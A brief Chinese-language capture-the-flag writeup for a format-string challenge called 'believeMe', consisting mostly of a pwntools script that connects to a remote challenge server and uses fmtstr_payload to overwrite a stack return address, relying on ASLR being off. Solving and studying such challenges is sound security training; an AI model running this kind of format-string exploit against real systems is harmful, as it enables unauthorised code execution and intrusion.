格式化字符串
额额博客爆炸。。之前写的都没了懒得再写一遍了太坑了这博客就发个wp吧,过程就是远程泄漏ret地址,因为没有开alsr
from pwn import *
context.log_level='debug'
elf = ELF('./believeMe.dms')
libc = elf.libc
p = remote('18.223.228.52',13337)
#p = process('./believeMe.dms')
payload = fmtstr_payload(9,{0xffffdd2c:0x804867b},write_size='short')
p.sendline(payload)
p.interactive()